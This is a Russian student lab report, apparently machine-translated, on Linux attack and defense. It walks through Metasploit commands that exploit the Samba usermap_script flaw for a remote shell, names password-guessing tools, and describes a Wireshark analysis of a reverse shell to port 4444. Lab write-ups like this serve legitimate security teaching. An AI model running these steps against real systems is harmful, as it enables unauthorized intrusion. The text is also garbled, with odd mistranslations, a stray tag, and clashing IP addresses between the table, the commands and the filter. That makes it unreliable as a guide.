Оглавление
Практика 7. Атака и защита операционной системы Linux
1.1 Базовая структура операционной системы Linux
1.2 Механизм безопасности операционной системы Linux
Технология удаленной атаки и защиты системы Linux
3. Проблемы, возникающие в процессе обучения, и их решения.
Практика 7. Атака и защита операционной системы Linux
1.Практическое содержание
1.1 Базовая структура операционной системы Linux
Преимущества Линукса:
- Код с открытым исходным кодом
- Кроссплатформенная аппаратная поддержка
- Богатая поддержка программного обеспечения
- Несколько пользователей и несколько сервисов
- Надежная безопасность
- хорошая стабильность
- Полные сетевые функции
Структура системы Linux
-
Ядро операционной системы Linux: структура макроядра
-
Механизм управления процессами и потоками: вытесняющий многопользовательский многопроцессный режим.
-
Механизм управления памятью: позволяет нескольким процессам безопасно совместно использовать области физической памяти.
-
Механизм управления файловой системой: Механизм виртуального управления файлами VFS поддерживает десятки различных типов логических файловых систем.
-
Механизм управления устройством: Драйвер устройства — это программное обеспечение, которое обрабатывает или управляет аппаратным контроллером. По сути, это общая библиотека привилегированных, резидентных в памяти низкоуровневых процедур управления оборудованием.
-
Сетевой механизм: сетевой модуль ядра обеспечивает доступ к различным сетевым стандартам и поддержку различного сетевого оборудования. Сетевые интерфейсы можно разделить на стеки сетевых протоколов и сетевые драйверы.
-
Механизм системного вызова: интерфейс системного вызова позволяет приложениям получать доступ к аппаратным устройствам и другим системным ресурсам через этот интерфейс. Системные вызовы реализуются посредством программных прерываний.
1.2 Механизм безопасности операционной системы Linux
Механизм аутентификации личности Linux
- Внедрите управление идентификацией пользователей, создав несколько типов ролей пользователей и групп пользователей, чтобы гарантировать, что несколько пользователей могут безопасно использовать операционную систему Linux.
- Группа пользователей: совокупность учетных записей пользователей с одинаковыми характеристиками, используемая для упрощения управления правами пользователей во всей системе.
- Механизм аутентификации локального пользователя: самый простой механизм аутентификации пользователя.
- Механизм аутентификации пользователя при удаленном входе: используйте службу SSH для входа в систему и доступа к сети удаленного пользователя.SSH предоставляет два метода механизмов аутентификации пользователей: на основе пароля и на основе асимметричного ключа.
Механизм аудита безопасности Linux
в основном реализуется через три основные подсистемы журналов, в том числе:
- Журнал практики подключения: выполняется несколькими программами
- Журнал статистики процесса: выполняется ядром системы.
- Регистрация ошибок: выполняется общей службой журналирования syslogd(8).
Технология удаленной атаки и защиты системы Linux
①Основные методы удаленного сетевого проникновения в системы Linux.
-
Проводить атаки с угадыванием паролей пользователей, участвующих в процессе аутентификации личности различных сетевых служб в системе Linux, надеясь взломать реальную и эффективную учетную запись пользователя и пароль определенной службы, тем самым выдавая себя за личность пользователя и проникая в систему.
-
Обнаружение уязвимости безопасности в сетевой службе мониторинга в системе Linux и ее эксплуатация, внедрение кода модуля загрузки атаки в процесс целевой службы для выполнения, тем самым предоставляя злоумышленнику доступ к локальной оболочке.
-
Атакуйте клиентские программы и пользователей с помощью средств технической и социальной инженерии, таких как веб-трояны, рассылка мошеннических электронных писем и предоставление троянских программ.Клиентское программное обеспечение или пользователи устанавливают и запускают вредоносные программы, тем самым активно открывая дверь системы Linux для злоумышленников.
-
Когда система Linux используется в качестве маршрутизатора, соединяющего несколько сетей, или когда беспорядочный режим включен в качестве прослушивателя сетевого анализа, она может быть атакована пакетами, специально созданными злоумышленниками, что позволяет злоумышленнику получить доступ.
②Атака удаленного подбора пароля Linux
- Система Linux в основном поддерживает удаленное управление по сети через протоколы telnet, rlogin, rsh и SSH.Эти протоколы используют встроенное имя пользователя и пароль системы Linux для аутентификации удаленных пользователей. Если злоумышленник сможет удаленно угадать набор имен пользователей и паролей с помощью этих сетевых протоколов, он сможет использовать эту информацию для удаленного входа в систему Linux и получения прав локального доступа.
- Автоматизированные инструменты удаленного подбора пароля, которые позволяют злоумышленникам, в том числе: Brutus, THC Hydra, Cain и Abel.
③ Атаковать клиентские программы и пользователей Linux.
- Атака клиентских программ на платформах Linux
- Атака на пользователей системы Linux. Распространенные сценарии обмана, включающие применение методов социальной инженерии, разработаны в электронных письмах и программах обмена мгновенными сообщениями, чтобы заставить пользователей щелкнуть и запустить вложения электронной почты или исполняемые программы или вредоносные документы, передаваемые через программное обеспечение для обмена мгновенными сообщениями, для доступа к определенным вредоносным адресам. а также непреднамеренную утечку некоторой конфиденциальной информации о конфигурации сервера, позволяют злоумышленнику получить возможность запускать вредоносные программы на сервере и направляют клиентское программное обеспечение для доступа к коду атаки на проникновение, тем самым получая информацию о системе на глазах у администратора. . Права доступа.
2. Практический процесс
(1) Использование Metasploit для проведения атак удаленного проникновения в Linux.
Задача: использовать программное обеспечение для тестирования на проникновение Metasploit, чтобы атаковать уязвимость безопасности службы Samba Usermap_script на целевой машине Linux и получить права доступа к хосту целевой целевой машины Linux. Практические шаги заключаются в следующем:
① Запустите программное обеспечение Metasploit и используйте одну из msfconsole, msfgui или msfweb в соответствии с вашими личными предпочтениями;
②Использовать эксплойт: модуль атаки на проникновение эксплойта/multi/samba/usermap_script;
③Выберите атаку PAYLOAD в качестве удаленной оболочки (допускается прямое или обратное соединение);
④Установить параметры атаки на проникновение (RHOST, LHOST, TARGET и т. д.);
⑤Выполнение атак проникновения;
⑥ Проверьте, правильно ли получена удаленная оболочка, и проверьте полученные разрешения.
машина | ИП |
---|---|
штурмовик Кали | 192.168.200.13 |
дрон-мишень | 192.168.19.130 |
Атакующая машина Kali может успешно пинговать целевую машину.
Используйте команду:msfconsole
Запустить метасполит
Введите команду search usermap_script для поиска информации об уязвимости безопасности службы Samba Usermap_script на целевом компьютере и введите использование модуля уязвимости.
Выберите модуль, просмотрите полезные данные и используйте команду set payload 18
для выбора режима 18:
Используйте команду: set RHOST 192.168.200.124
, чтобы установить IP-адрес целевой машины; используйте команду: set LHOST 192.168.200.3
, чтобы установить IP-адрес атакующей машины.< /а>
Введите:exploit
чтобы атаковать, пасуйтеifconfig
Используйте команду ls, чтобы просмотреть файл и подтвердить полученные разрешения.
(2) Практическое домашнее задание: практика наступательного и защитного противостояния.
Злоумышленник: используйте Metasploit, выберите уязвимость, обнаруженную на целевой машине Metasploitable, для проведения атак на проникновение, получения прав удаленного управления и попытайтесь дополнительно получить root-привилегии.
Защитник: используйте tcpdump/wireshark/snort для мониторинга файлов пакетов сетевой атаки, анализа процесса атаки с помощью Wireshark/Snort и получения IP-адреса злоумышленника, целевого IP-адреса и порта, времени начала атаки, уязвимости эксплойта атаки, использования шелл-кода, и информация об успехе введена позже в командной строке.
Процесс атаки злоумышленника аналогичен экспериментальному этапу (1): Защитник открывает Wireshark для мониторинга и устанавливает условия фильтрации ip.addr == 192.168.19.130 && ip.addr == 192.168.19.128. Здесь вы можете увидеть использование 139 порта вторжения.
Некоторые из используемых здесь протоколов SMB используют nohup для выполнения команд в фоновом режиме, а затем используют bash для перенаправления оболочки на порт 4444 Kali с помощью telnet.
3. Проблемы, возникающие в процессе обучения, и их решения.
- Проблема 1: Штурмовик вначале не может пинговать самолет-цель.
- Решение проблемы 1. Перезапустите виртуальную машину.
4. Изучение мыслей и опыта
В ходе этой практики я в основном узнал об атаке и защите операционной системы Linux, а также о процессе атаки на проникновение.Я глубоко понял общие этапы сетевых атак и защиты.В то же время мне необходимо усилить изучение теоретических знания, чтобы лучше освоить технологии сетевых атак и защиты.